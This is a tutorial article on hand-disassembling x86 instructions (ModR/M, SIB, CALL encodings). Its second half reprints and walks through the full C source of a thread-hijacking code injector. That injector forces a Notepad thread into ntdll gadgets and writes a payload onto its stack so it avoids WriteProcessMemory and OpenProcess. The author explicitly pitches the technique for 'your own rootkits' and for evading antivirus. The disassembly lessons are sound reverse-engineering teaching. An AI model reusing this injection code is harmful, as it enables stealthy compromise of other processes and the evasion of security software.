An in-depth look at how to disassemble the x86 instruction set, and how to put it to good use in your own code injections

Introduction

When starting out as a reverse engineer or malware analyst, it is often tempting to trust your disassembler to correctly resolve the various bytes into code or data. However, to become an expert, it is important to gain as much insight as possible into the Instruction Set Architecture (ISA) of the chip you are working with. This opens many new possibilities: polymorphic code becomes easier to handle, and you become able to use some custom disassembly techniques in your own rootkits or understand these techniques when used by others.

In this article, I will attempt to explain the encoding of the x86 instruction set as clearly as possible. As a noob I lost a few nights' sleep trying to put all of this together in my brain: The information on how to understand the instruction set is scattered over several different places, and is not always explained clearly (the Intel manuals are a prime example). So my main purpose is to make this topic a little easier for beginners and make a small contribution to the pretty meager list of resources on advanced x86 assembly.

In the first part of this article, I'll explain how to read and disassemble x86 instructions by hand, then work through several examples. In the second part, we'll discuss how this knowledge can be used by malware authors and analysts by examining some rootkit code which makes use of minimalist disassembly techniques for code injection.

Before we begin, let me just state that most of the material from the first part of the article can be found in much more detail in Randall Hyde's Art of Assembly, particularly this chapter. Hyde's book is by far the best resource for those seeking to master the x86 architecture. Please note that we will only deal with the x86 (32-bit) instruction set for now. I assume that the reader is already reasonably familiar with x86 assembly.

A quick look at the x86 instruction structure

The main thing to note as you start to study the x86 instruction encoding scheme is to keep in mind that it is basically a kludge. This instruction scheme had to rapidly evolve from an 8-bit architecture to a 32-bit one in a very short amount of time while still maintaining backward compatibility. This is no mean feat, but it came at a cost, and one sometimes gets the sense that Intel's engineers shoved each expansion of the instruction set in the first available slot, while not really paying attention to the scheme's overall cleanness or logic. So, figuring out what goes where will sometime seem like a confusing labyrinth of conflicting conditions and unclear objectives. As always, the best solution is to stick to it even when the going gets tough. Eventually it will all seem pretty easy.

The figure above gives a pretty comprehensive description of most possible forms an x86 instruction could take. Don't panic. Many instructions use only one or two bytes (those which are marked red are the most essential ones). First we'll go over what each section means. This will necessarily be abstract, so don't worry if it doesn't stick the first time. The examples will make everything clear in time. Let's go over each section:

The instruction prefixes - This is an optional collection of 1-4 bytes which somehow modify or add to the default behavior of an instruction. This is most often used when adding the REP or REPNE prefixes to an instruction, when using the LOCK prefix or when overriding the default segment used by an instruction. Adding a size prefix will also allow us to change the default operand or address size used by the instruction, since most x86 instructions act on a default operand size according to the current chip architecture. Using these prefixes is pretty simple once you get a grasp of the big picture, so we'll ignore those in this article to avoid unnecessary clutter.

The instruction opcodes themselves - This is the actual instruction code, optionally prefixed by an expansion code (0x0F). Most popular instructions are only one byte long (that is, without the 0x0F prefix), so for simplicity's sake most instructions which we'll disassemble here will only use one byte opcodes. When the entire instruction is composed of a single one byte opcode, and when that instruction requires an operand (e.g., PUSH or POP) this byte will also include a variying 3 bit field to specify the register being acted on. More on that in the examples.

The Mod-Reg-R/M byte - This byte determines the instruction's operands and the addressing modes relating to them. In order to understand the meaning of this byte in the instruction's structure, we'll first need to have a quick look at the three bits that refer to each register in the x86 encoding (these bit fields will appear in several different places, as will be explained shortly). Here's how to decode a three-bit register reference in x86 encoding:

000 (decimal 0) - EAX (AX if data size is 16 bits, AL if data size is 8 bits)

001 (1) - ECX/CX/CL

010 (2) - EDX/DX/DL

011 (3) - EBX/BX/BL

100 (4) - ESP/SP (AH if data size is defined as 8 bits)

101 (5) - EBP/BP (CH if data size is defined as 8 bits)

110 (6) - ESI/SI (DH if data size is defined as 8 bits)

111 (7) - EDI/DI (BH if data size is defined as 8 bits)

While it might seem annoying to have to refer to this table now, after decoding a few instructions on your own it becomes second nature.

Now let's see how these 3-bit encodings fit into the larger scheme when placed in the Mod-Reg-R/M byte. As can be seen from the figure above, the Reg and R/M sections in this byte consist of three bits each. The Reg section will in most cases consist of an encoded reference to a register (except in the case of an opcode extension - more on that later). The R/M section can consist of either the same kind of reference to a register or a code which tells the processor to further utilize the SIB byte or the displacement bytes. Note that the instruction opcode itself determines which of these operands is the source and which is the destination.

The key to understanding the Mod-Reg-R/M byte is the 2-bit Mod field, whose value determines how the next two fields will be interpreted. Let's have a look at the four possible options:

00 - Indirect addressing mode: Fetch the contents of the address found within the register specified in the R/M section. For example, when the Mod bits are set to 00 and the R/M bits are set to 000, the addressing mode is [eax] (dereference the address at eax). Two exceptions to this rule are when the R/M bits are set to 100 - that's when the processor switches to SIB addressing and reads the SIB byte, treated next - or 101, when the processor switches to 32-bit displacement mode, which basically means that a 32 bit number is read from the displacement bytes (see figure 1) and then dereferenced.

01 - This is essentialy the same as 00, except that an 8-bit displacement is added to the value before dereferencing.

10 - The same as the above, except that a 32-bit displacement is added to the value.

11 - Direct addressing mode. Move the value in the source register to the destination register (the Reg and R/M byte will each refer to a register).

This is troublesome to memorize, so this table from osdev.org is your best friend in figuring out how to deal with the various Mod-R/M values.

The SIB byte - The Scale-Index-Base byte (conveniently named in the exact order of its bit fields) is used for indexed addressing (ideal for arrays and such). The basic addressing mode is [Base+(Index*Scale)], where Base is the basic array offset, Scale is the size of the data (1, 2, 4 or 8 bytes) and Index is the position to be accessed in the array. Of course, it's not as simple as all that and Intel just had to add a few kludges to keep things interesting. It's best not to let your head hurt too much over this: Just keep the table from osdev.org at hand and you'll be fine.

The displacement bytes and the immediate bytes - These will be used to indicate either a constant offset from an address to be references, or a constant value to be used by an instruction. We will see how these are used in the examples.

Some actual disassembly

This convoluted encoding scheme can be pretty tough to grasp without some examples. Let's work through a few.

We'll start with the famous function prologue, which sets up the stack for the new function. Let's see how the beginning of a function looks in assembly, and then disassemble it back to the original, human-readable instructions. When looking at the beginning of a function, you'll normally see this series of bytes: 55 8B EC. Let's take this one byte at a time.

The best resource to use when trying to figure out which byte correlates to which instruction is the X86 Opcode and Instruction Reference by MazeGen. Looking at the page, we see two sets of instructions: one byte instructions, or two byte instructions starting with the instruction expansion byte 0F. We're now looking at a byte with the value of 55. We don't see a 0F prefix, so we'll just choose 55 in the one byte instruction menu.

Upon clicking, we see that we are directed to a table in which the nearest hex value to 55 is 50, with a +r next to the number. This means that 50 is the value of the first (most-significant) bits of the instruction, and the three least significant bits contain the operand register encoding. This is the same encoding that we've discussed earlier. We also see that an instruction byte value of 50 corresponds to the PUSH instruction.

To get more details about the instruction, this is the time to meet your new best friend: The (unfortunately) indispensable Intel 64 and IA-32 Architectures Software Developer's Manual, one of the most obtuse references on the planet. Grab a copy from here, skip to volume 2, chapter 4, and look up PUSH in the instruction reference.

As you can see, the relevant opcode here is 50+rd. According to the Intel notation (of which section 3.1.1 in volume 2 of the Intel manuals will give you a comprehensive run through), +rd at the end of a byte value means the same thing that I described earlier: the three least significant bits will indicate the operand register. You can also see that the PUSH instruction can come in several other opcode variants: 68 followed by an immediate 32 bit value, for instance, will push that value on the stack. The bit length of the immediate value is determined by the current architecture (i.e., 32 bits for 32-bit systems and 64 bits for 64-bit systems) and can be overriden by adding a size prefix in the place reserved for the instruction prefixes. Throughout the rest of the tutorial, we'll have a look at each instruction in the Intel manual and, if necessary, explain the notation.

Looking at the diagram, you can see that that the last three bits of the instruction, 101, designate EBP as the operand. Therefore, 55 disassembles as PUSH EBP, the first instruction of the function prologue.

Moving on to the next instruction, we see the byte 8B. Looking it up in MazeGen's table, we see that this is the encoding of the MOV instruction. Hopping to the Intel manual, we see that this particular encoding of the MOV instruction has an /r next to it in the opcode column and has an RM in the Op/En column. The /r next to the instruction indicates first that this instruction requires a Mod-Reg-R/M byte for its operands, and second, that the instruction uses both the Reg and R/M byte to denote its operands. The RM value in the Op/En coding indicates the direction of the operation, with the source on the right and destination on the left: M denotes the R/M byte and R denotes the Reg byte. As you can see, the direction here is from R/M to the register.

This is the place to also mention a small trick: In many instructions, the direction of the operation is determined by the second least-significant bit in the instruction opcode - when that bit is turned off Reg holds the source operand and R/M holds the destination operand. When it's on, the situation is reversed. For instance, look at 8B (MOV R, R/M) versus 89 (MOV R/M, R). If we quickly resolve both bytes to binary, we'll see that 8B is 10001011 and 89 is 10001001. As you can see, the second bit from the right is turned off in the latter, and this changes the direction of the instruction. The least significant bit (the register bit) will, in many instructions including MOV, determine if the instruction operands are 32-bit (16-bit in relevant architectures or when using the size override prefix) or 8-bit.

Since we already know that the next byte (0xEC) is the Mod-Reg-R/M byte, the rest of this instruction is easy to decipher. The Mod bits are 11, which means that we're using direct register addressing (instead of indirection). The Reg bits (101) indicate that the destination operand is EBP, and the R/M bits (100) indicate that the source is ESP.

A slightly more challenging instruction to disassemble is 8D 44 38 02. Starting at the 8D opcode and checking MazeGen's table, we see that this is the LEA instruction. Cutting over to the Intel manual, we see that the LEA instruction has only one possible variation, and a quick glance at the Op/En column tells us that the operands are RM - the Reg field will give us the destination operand (necessarily a register), and the M field will give us the source operand (a memory location).

Continuing to the next byte in the instruction, 44, we know that this has to be the Mod-Reg-R/M byte and we analyze it accordingly. We get a Mod value of 01, which means that the R/M operand will be a location in memory, and that we will add an 8-bit displacement before dereferencing the address and fetching the contents of that memory location. We also get a Reg value of 000, so we know that EAX is the destination operand, and an R/M value of 100, which means that the source operand will be determined by the contents of the SIB byte, coming up next.

Looking at the SIB byte, which is 38, we get a Scale value of 00, which means that there is no multiplication of the index. We also get an Index value of 111 (EDI) and a Base value of 000 (EAX). The basic addressing formula using the SIB byte is Base + (Index*Scale), and in this case this resolves to EAX+(EDI*1). Don't forget that we're working with a Mod value of 01, so we still need to look forward one byte and treat that byte as an 8-bit displacement value to be added to the address we resolved by analyzing the SIB byte. The value is 02, so the final instruction we get is: LEA EAX, [EAX+EDI+2]. Normally the address calculated in the source operand would be dereferenced and the contents fetched from memory, but we're looking at a classic use of the LEA instruction for arithmetic operations, and in this case it is the result of the calculation itself (which is not necessarily an address) which is stored in EAX.

In the next example, we'll have a look at the CALL instruction - which, when you actually look at the encoding, turns out to be two different instructions. The first encoding, E8, uses relative addressing, and the second encoding, FF, uses absolute addressing.

Let's try to disassemble the following bytes: FF 15 14 12 40 00. Checking out MazeGen's table as usual, we see that there are several instruction encoded as FF, including DEC, INC, CALL and JMP. What gives? The next column in the table (titled with an 'o' for opcode extensions) gives us a hint. We see that the digits in this column differentiate the FF encoded instructions from each other. But what is this field? This is the value of the opcode extension, which according to the Intel manuals is "A digit between 0 and 7 (which) indicates that the ModR/M byte of the instruction uses only the r/m (register or memory) operand. The reg field contains the digit that provides an extension to the instruction's opcode".

What this effectively means is that to distinguish this instruction we need to have a look at the Mod-Reg-R/M byte. Analyzing the next byte (15), we see that the Reg field has a value of 010 - or decimal 2. Looking at MazeGen's table again, we see that the opcode extension for the CALL instruction is 2. Bingo!

Moving on to the Intel manuals, we look up the CALL instructions and we see that the one which is relevant in this case is FF /2 (/n is simply the way the Intel manuals denote an opcode extension in the Reg field, and n is the extension value), which is a call to an absolute address. From the manual we can also see that there is a different CALL instruction, encoded as E8, which takes a relative address (the 'cd' next to the instruction simply indicates that it takes a 4-byte value which in this case is an immediate value denoting the relative address).

Looking next at the R/M field, we see that its value is 101, which, together with Mod=00, means that a 32-bit displacement will follow the Mod-Reg-R/M byte. Translating the value 14 12 40 00 from little endian gives us the address 0x401214, which in this case happens to be an entry in the IAT which at load time will hold the actual address of the function.

Let's also look at the other kind of CALL. Check out the following instruction: E8 19 C1 FF FF. From MazeGen's table we see that this is the second version of the CALL instruction which uses relative addressing, and that we should look for a 32-bit value after the instruction. This is FFFFC119 (after translating from little endian), and when we convert this to a signed number we get negative 3EE7. To resolve the actual address that this refers to, we take the current instruction pointer, add to it the number of bytes which the instruction takes up (in this case 5), and add the relative address. For example, if the instruction which we are disassembling appears at 40C9EF, we add 5 to this figure and subtract 3EE7, which gives us a final address of 408B0D. In Ida Pro, for example, this instruction would be disassembled as call sub_408B0D .

Working through these few examples should have given you the tools you need to look up pretty much any instruction on your own in the Intel manuals.

Practical implementation in rootkit code

Being able to understand the raw opcode bytes is a very powerful skill, since it enables you to understand the code at the deepest level, as well as dynamically analyze and manipulate it. To emphasize this point, we'll briefly analyze some rootkit code which makes use of these techniques in order to dynamically inject malicious code into a remote thread.

The code which we'll analyze is Thread Hijacker by Echo. This program utilizes an alternative approach to code injection by avoiding the use of the WriteProcessMemory API function (which is considered unsafe to use by malware authors) and directly manipulating a specific remote thread by using GetThreadContext and SetThreadContext. We should note that this method is not as stealthy as it used to be, and in the case of this particular code will also not work on systems with DEP and ASLR. But it's perfect for our needs, since the author makes use of some interesting disassembly techniques to carry out the injection. The essence of these techniques can be used in many rootkit implementation or defensive tools.

To begin with, Echo's code gets a handle to a remote thread of the Notepad process without using OpenProcess (which triggers many AV hooks), then passes that handle to the HijackThread function. functionData is the malicious function's code. Let's have a look at the code:

window = FindWindow(NULL, " Untitled - Notepad" ); TIDNotepad = GetWindowThreadProcessId(window, NULL); if (HijackThread( " notepad.exe" , TIDNotepad, window, (PDWORD)functionData, 24 , 16 - 1 )) ret = 0 ;

The HijackThread function does most of the work, and calls most of the other important functions. Here is the real meat of the code. Have a look, then we'll step through it and see what everything does:

BOOL HijackThread(LPSTR processName, DWORD TDI, HWND window, PDWORD injectionCode, DWORD injectionCodeSize, DWORD injectionSelfJmp) { SCAN_RESULTS scanResult; CONTEXT contextOrg, contextThread; BOOL ret = FALSE; HANDLE thread ; DWORD stackPosAddr, i; if (!processName || !injectionCode || !injectionCodeSize) return FALSE; if (( thread = OpenThread(THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT, FALSE, TDI))){ if (SuspendThread( thread ) != - 1 ){ ZeroMemory(&contextOrg, sizeof (CONTEXT)); contextOrg.ContextFlags = CONTEXT_FULL; if (GetThreadContext( thread , &contextOrg)){ contextThread = contextOrg; if (ScanMOVJMP( " NTDLL.DLL" , &scanResult)){ if (scanResult.regSrc == EBX) contextThread.Ebx = scanResult.jmpAddr; else if (scanResult.regSrc == EBP) contextThread.Ebp = scanResult.jmpAddr; else if (scanResult.regSrc == ESI) contextThread.Esi = scanResult.jmpAddr; else if (scanResult.regSrc == EDI) contextThread.Edi = scanResult.jmpAddr; contextThread.Eip = scanResult.movAddr; stackPosAddr = contextThread.Esp - scanResult.signedDisp; if (scanResult.regDest == EBX) contextThread.Ebx = stackPosAddr - 4 ; else if (scanResult.regDest == EBP) contextThread.Ebp = stackPosAddr - 4 ; else if (scanResult.regDest == ESI) contextThread.Esi = stackPosAddr - 4 ; else if (scanResult.regDest == EDI) contextThread.Edi = stackPosAddr - 4 ; contextThread.Esp -= scanResult.espAdjust + 4 ; SetThreadContext( thread , &contextThread); WaitForSelfJMP( thread , window, scanResult.jmpAddr); if (!SetProcessMemoryPrivs(processName, (LPVOID)((stackPosAddr - 4 + scanResult.signedDisp) - injectionCodeSize), injectionCodeSize, PAGE_EXECUTE_READWRITE)){ SetThreadContext( thread , &contextOrg); ResumeThread( thread ); CloseHandle( thread ); return FALSE; } for (i = 0 ; injectionCodeSize; i++, injectionCodeSize -= 4 ) WriteDWORD( thread , &contextThread, window, ((stackPosAddr - 4 ) - injectionCodeSize), injectionCode[i], scanResult.regSrc, scanResult.regDest, scanResult.jmpAddr); contextThread.Eip = (stackPosAddr - 4 + scanResult.signedDisp) - (i * 4 ); contextThread.Esp = contextThread.Eip - (i * 4 ); SetThreadContext( thread , &contextThread); WaitForSelfJMP( thread , window, contextThread.Eip + injectionSelfJmp); SetThreadContext( thread , &contextOrg); ret = TRUE; } } ResumeThread( thread ); } CloseHandle( thread ); } return ret; } BOOL ScanMOVJMP(LPTSTR dllName, PSCAN_RESULTS scanResult) { HMODULE module; DWORD dllBase; PIMAGE_DOS_HEADER dosHeader; PIMAGE_NT_HEADERS ntHeader; PBYTE bytePos, byteEnd; INT scanStage = 0 ; if (!dllName || !scanResult || !(module = GetModuleHandle(dllName))) return FALSE; dllBase = (DWORD)module; dosHeader = (PIMAGE_DOS_HEADER)dllBase; if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) return FALSE; ntHeader = (PIMAGE_NT_HEADERS)(dllBase + dosHeader->e_lfanew); if (ntHeader->Signature != IMAGE_NT_SIGNATURE) return FALSE; bytePos = (PBYTE)(dllBase + ntHeader->OptionalHeader.BaseOfCode); byteEnd = bytePos + ntHeader->OptionalHeader.SizeOfCode; while (bytePos < byteEnd){ if (*bytePos == OP_MOV && !(scanStage & 1 )){ if (CheckMOV(bytePos, scanResult)) { if (ScanRET(bytePos + ((scanResult->signedDisp == 0 ) ? 2 : 3 ), scanResult)) scanStage |= 1 ; } } else if (*bytePos == OP_JMP && !(scanStage & 2 )){ if (*(bytePos + 1 ) == JMP_NEG2){ scanResult->jmpAddr = (DWORD)bytePos; scanStage |= 2 ; } } bytePos++; } return (scanStage == 3 ); } BOOL CheckMOV(PBYTE codeAddr, PSCAN_RESULTS scanResult) { CPU_REGISTER regSrc, regDest; BYTE ModRMModbyte = ((codeAddr[ 1 ] & RM_MOD) >> 6 ); if (codeAddr && scanResult && ModRMModbyte < 2 ){ regDest = (CPU_REGISTER)(codeAddr[ 1 ] & REG_MASK); regSrc = (CPU_REGISTER)((codeAddr[ 1 ] >> 3 ) & REG_MASK); if (regSrc != ESP && regSrc != regDest){ if (regSrc >= EBX && regSrc != EBP && regDest >= EBX && regDest != EBP){ if (ModRMModbyte > 0 ){ if (regDest == ESP) return FALSE; scanResult->movAddr = (DWORD)codeAddr; scanResult->regSrc = regSrc; scanResult->regDest = regDest; scanResult->signedDisp = ( signed char )codeAddr[ 2 ]; } else { scanResult->movAddr = (DWORD)codeAddr; scanResult->regSrc = regSrc; scanResult->regDest = regDest; scanResult->signedDisp = 0 ; } return TRUE; } } } return FALSE; } BOOL ScanRET(PBYTE codeAddr, PSCAN_RESULTS scanResult) { INT i; if (!codeAddr || !scanResult) return FALSE; for (i = 0 , scanResult->espAdjust = 0 ; i < SCAN_LEN; i++){ if ((codeAddr[i] & POP_REGS) == OP_POP && codeAddr[i] != OP_POP + ESP){ scanResult->espAdjust += 4 ; continue ; } if (codeAddr[i] == OP_ADD && codeAddr[i + 1 ] == RM_ADDESP){ scanResult->espAdjust += ( signed char )codeAddr[i + 2 ]; i += 2 ; continue ; } if (codeAddr[i] == OP_RETN || (codeAddr[i] == OP_RET && codeAddr[i + 2 ] == 0x00)) return TRUE; break ; } return FALSE; } VOID WaitForSelfJMP(HANDLE thread , HWND window, DWORD addrSelfJMP) { CONTEXT contextThread; if (!thread || !addrSelfJMP) return ; contextThread.ContextFlags = CONTEXT_FULL; if (window){ PostMessage(window, WM_NULL, 0 , 0 ); PostMessage(window, WM_NULL, 0 , 0 ); PostMessage(window, WM_NULL, 0 , 0 ); } do { ResumeThread( thread ); Sleep(THREAD_WAIT); SuspendThread( thread ); GetThreadContext( thread , &contextThread); } while (contextThread.Eip != addrSelfJMP); } BOOL WriteDWORD(HANDLE thread , PCONTEXT contextThread, HWND window, DWORD destAddr, DWORD source, CPU_REGISTER registerSource, CPU_REGISTER registerDest, DWORD jmpAddr) { if ( thread && contextThread && destAddr && jmpAddr){ if (registerSource == EBX) contextThread->Ebx = source; else if (registerSource == EBP) contextThread->Ebp = source; else if (registerSource == ESI) contextThread->Esi = source; else if (registerSource == EDI) contextThread->Edi = source; if (registerDest == EBX) contextThread->Ebx = destAddr; else if (registerDest == EBP) contextThread->Ebp = destAddr; else if (registerDest == ESI) contextThread->Esi = destAddr; else if (registerDest == EDI) contextThread->Edi = destAddr; if (SetThreadContext( thread , contextThread)){ WaitForSelfJMP( thread , window, jmpAddr); return TRUE; } } return FALSE; }

These are the relevant parts of the header file:

#define OP_MOV 0x89 #define OP_POP 0x58 #define OP_ADD 0x83 #define OP_RETN 0xC2 #define OP_RET 0xC3 #define OP_JMP 0xEB #define OP_CALL 0xE8 #define RM_ADDESP 0xC4 #define RM_MOD 0xC0 #define JMP_NEG2 0xFE #define POP_REGS ~0x07 #define REG_MASK 0x07 #define SCAN_LEN 32 #define THREAD_WAIT 100 typedef enum _CPU_REGISTER { EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI }CPU_REGISTER; typedef struct _SCAN_RESULTS { CPU_REGISTER regSrc; CPU_REGISTER regDest; char signedDisp; int espAdjust; unsigned long movAddr; unsigned long jmpAddr; }SCAN_RESULTS, *PSCAN_RESULTS;

This is fairly hairy C code for beginners, so if you fit the bill, don't panic. It'll become clear with a bit of effort. Let's start walking through it. First, we call OpenThread on the Notepad thread (the TDI variable), then we call SuspendThread on it, and then fill a local CONTEXT struct with the thread's context data, using a GetThreadContext call. The CONTEXT struct contains the values of all registers in that particular point in time of the thread's execution (which has been suspended with SuspendThread , so these values don't change on the fly). Next we call the ScanMOVJMP function on the string "NTDLL.DLL".

This function is where interesting stuff starts happening. First, the function gets a handle to the Ntdll module, then gets the BaseOfCode value (the beginning of the module's code section) by reading the PE header in a pretty standard way. At the end of this process we end up with two variables: bytePos , which starts as the beginning address of the code section, and byteEnd , which holds the address of the end of the code section. We then enter a simple loop which reads through the whole module's code.

But wait, if the target is to inject code into another process via one of its threads, why are we reading Ntdll in our own process' context? Remember that in systems which don't support ASLR (such as Windows XP), Ntdll will always load in the same base address for every single process. Which means that if we look for some particular code in Ntdll, that code's address will be the same in all processes.

So which code are we looking for? In our main loop, we first check if *bytePos == OP_MOV . Looking at the header file, we see that the specific code for OP_MOV we're looking for is 0x89. Skipping to the Intel manuals, we see that this particular encoding of the MOV instruction takes the contents of the register denoted in the Reg field (in the Mod-Reg-R/M byte) and moves them either to the register denoted in the R/M bit or to the address held in that register.

Take a look at the CheckMOV function which is called as soon as we find a MOV instruction. These few lines would probably have made a lot less sense before you knew all about instruction encoding:

CPU_REGISTER regSrc, regDest; BYTE ModRMModbyte = ((codeAddr[ 1 ] & RM_MOD) >> 6 ); if (codeAddr && scanResult && ModRMModbyte < 2 ){ regDest = (CPU_REGISTER)(codeAddr[ 1 ] & REG_MASK); regSrc = (CPU_REGISTER)((codeAddr[ 1 ] >> 3 ) & REG_MASK);

The ModRMModbyte variable is simply supposed to hold the value of Mod field in the Mod-Reg-R/M byte. This is done by fetching the next byte after the instruction opcode itself (pointed to by codeAddr ), and ANDing this byte with RM_MOD . Referring to the header file, RM_MOD equals 0xC0, which in binary is 11000000. If you recall, the Mod field is held in the first two bits of the Mod-Reg-R/M byte. Shifting the result of this AND calculation six bits to the right, we end up with the decimal value of the Mod field in the variable. This value will be between 0 and 3. Next, the code checks that the value of this variable is less than two - which means that the binary value of the Mod field has to be either 00 or 01, which means that the code is looking for indirect addressing via the R/M operand - which is to say, it's looking for a MOV instruction which moves a value from a register to a location in a memory address held by a register.

Once we find a MOV instruction which fits the bill, we save the source and destination registers in regDest and regSrc . This is done by first ANDing the value of the Mod-Reg-R/M byte with REG_MASK , which according to the header file is 0x07. This translates to 00000111, or the last three bits of the byte. We use this simple AND instruction to get at the R/M field and save its value in the regDest variable. Then we shift the Mod-Reg-R/M byte three bits to the right to get at the Reg field, and after ANDing it with REG_MASK save its value to regSrc.

Once we pass the CheckMOV test, the code also calls ScanRET . To understand what ScanRET does, we also need to use our newfound knowledge about instruction encoding:

for (i = 0 , scanResult->espAdjust = 0 ; i < SCAN_LEN; i++){ if ((codeAddr[i] & POP_REGS) == OP_POP && codeAddr[i] != OP_POP + ESP){ scanResult->espAdjust += 4 ; continue ; } if (codeAddr[i] == OP_ADD && codeAddr[i + 1 ] == RM_ADDESP){ scanResult->espAdjust += ( signed char )codeAddr[i + 2 ]; i += 2 ; continue ; } if (codeAddr[i] == OP_RETN || (codeAddr[i] == OP_RET && codeAddr[i + 2 ] == 0x00)) return TRUE; break ; }

As you see, we're entering a for loop scanning SCAN_LEN bytes from the MOV instruction we found, and looking for particular instructions. But which? You can see that the value of the current byte is ANDed with POP_REGS , which is defined in the header file as ~0x07, or 11111000, so we're zeroing out the three bit register value and then comparing the result with OP_POP (the POP operand code, 0x58). Then we check that we're not popping ESP, and then incrementing the espAdjust value by 4 bytes (the number of bytes which the POP instruction chops off the stack). Next, we run the same kind of test to see whether we run into an ADD instruction which adds any value to ESP, thus bringing down the stack. We also take the amount added to ESP and increment espAdjust accordingly. Eventually, when we hit a RET instruction, and if we haven't surpassed SCAN_LEN , we return TRUE.

What was the point of this code, and why did we need to keep track of the stack pointer position in this way? We'll get the answer shortly, but first let's see how the ScanMOVJMP loop concludes:

while (bytePos < byteEnd){ if (*bytePos == OP_MOV && !(scanStage & 1 )){ if (CheckMOV(bytePos, scanResult)) { if (ScanRET(bytePos + ((scanResult->signedDisp == 0 ) ? 2 : 3 ), scanResult)) scanStage |= 1 ; } } else if (*bytePos == OP_JMP && !(scanStage & 2 )){ if (*(bytePos + 1 ) == JMP_NEG2){ scanResult->jmpAddr = (DWORD)bytePos; scanStage |= 2 ; } } bytePos++; }

As you can see, after we pass CheckMOV and ScanRET , we look for a very specific instruction: the JMP instruction which takes 0xFE (-2) as an operand. Since this instruction is 2 bytes, what it effectively does is enter an infinite loop. The beautiful thing here is that the Ntdll code itself doesn't need to use this instruction itself: We simply need to find a byte sequence which equals EB FE, anywhere in the ocean of bytes which make up Ntdll's code, and we're good to go. Run this code in a debugger and you'll see that it will probably catch this byte sequence in the middle of a totally different instruction. But so long as the instruction pointer points to this particular address, this is the instruction which the processor will execute. The reason why we're looking for this particular instruction will also become clear in a moment.

We're now ready to look at the main part of the code and finally understand exactly what it does:

if (ScanMOVJMP( " NTDLL.DLL" , &scanResult)){ if (scanResult.regSrc == EBX) contextThread.Ebx = scanResult.jmpAddr; else if (scanResult.regSrc == EBP) contextThread.Ebp = scanResult.jmpAddr; else if (scanResult.regSrc == ESI) contextThread.Esi = scanResult.jmpAddr; else if (scanResult.regSrc == EDI) contextThread.Edi = scanResult.jmpAddr; contextThread.Eip = scanResult.movAddr; stackPosAddr = contextThread.Esp - scanResult.signedDisp; if (scanResult.regDest == EBX) contextThread.Ebx = stackPosAddr - 4 ; else if (scanResult.regDest == EBP) contextThread.Ebp = stackPosAddr - 4 ; else if (scanResult.regDest == ESI) contextThread.Esi = stackPosAddr - 4 ; else if (scanResult.regDest == EDI) contextThread.Edi = stackPosAddr - 4 ; contextThread.Esp -= scanResult.espAdjust + 4 ; SetThreadContext( thread , &contextThread); WaitForSelfJMP( thread , window, scanResult.jmpAddr); if (!SetProcessMemoryPrivs(processName, (LPVOID)((stackPosAddr - 4 + scanResult.signedDisp) - injectionCodeSize), injectionCodeSize, PAGE_EXECUTE_READWRITE)){ SetThreadContext( thread , &contextOrg); ResumeThread( thread ); CloseHandle( thread ); return FALSE; } for (i = 0 ; injectionCodeSize; i++, injectionCodeSize -= 4 ) WriteDWORD( thread , &contextThread, window, ((stackPosAddr - 4 ) - injectionCodeSize), injectionCode[i], scanResult.regSrc, scanResult.regDest, scanResult.jmpAddr); contextThread.Eip = (stackPosAddr - 4 + scanResult.signedDisp) - (i * 4 ); contextThread.Esp = contextThread.Eip - (i * 4 ); SetThreadContext( thread , &contextThread); WaitForSelfJMP( thread , window, contextThread.Eip + injectionSelfJmp); SetThreadContext( thread , &contextOrg); ret = TRUE; }

In this case, the contextThread variable is the CONTEXT struct which will hold the new context that we will pass to the injected thread via SetThreadContext . The first thing that we do after coming back from ScanMOVJMP with our data is set the source register of the MOV instruction to the address of the JMP -2 instruction that we found earlier. Then, we set the EIP register of the injected thread to the MOV instruction, then finally change the destination register of that instruction to the address of one place above the top of the stack (with some adjustments to account for any usage of a signed disposition in the MOV instruction).

The next line will clear up why we've been calculating the changes in the stack position and saving them in espAdjust . Here, we decrement the ESP register of the injected thread by the adjustment value, therefore creating a sort of "stack cave". When the code executes, we know that the junk data in this cave will be popped off the stack until, by the time we reach the RET instruction, ESP will point to stackPosAddr - which is where the MOV instruction that we modified moved the address of the JMP -2 instruction. Once we shoot off SetThreadContext , we will effectively force the thread into an infinite loop.

The WaitForSelfJMP function, called next, will check that we have actually entered this condition. Once that is the case, we use the WriteDWORD function to actually carry out the injection. This function is straightforward and should be easy to understand: All it does is set the source register of our captured MOV instruction to one byte of the function to be injected, and the destination register of the instruction to the address of a continuously decremented stack pointer. The address of the MOV instruction is on the stack and will be popped into EIP at the end of each iteration. We repeat this in a loop until the injected function is fully placed on the stack, then we change EIP to its starting address. Unfortunately, as already noted, this code will not work under systems which have DEP enabled, since executing code from the stack is no longer possible. Also, this will not work under ASLR, since the address of Ntdll will not be the same in all processes.

Echo's code is an excellent example of how intimate knowledge of the way instructions are encoded and assembled can help us write original and effective code, whether for our own rootkits or for defensive tools. Using a minimal and dynamic disassembly engine, Echo is able to dynamically look for specific instructions and adjust his code accordingly. The use of API functions is also minimized, and therefore the detection surface offered to AV software or intrusion detection systems is greatly reduced.

Conclusion

This article aimed to provide a solid tutorial on how to read and decode x86 opcodes, and to show how to put this knowledge to use in your own tools. Eventually, reverse engineers and malware analysts cannot escape the need to understand the system at the deepest level, and this often means being a little too intimate with all those bytes and bits. But knowledge is power, and you will find that learning your way around the Intel manuals and paying close attention to the small details will enhance your skill in exciting and unexpected ways.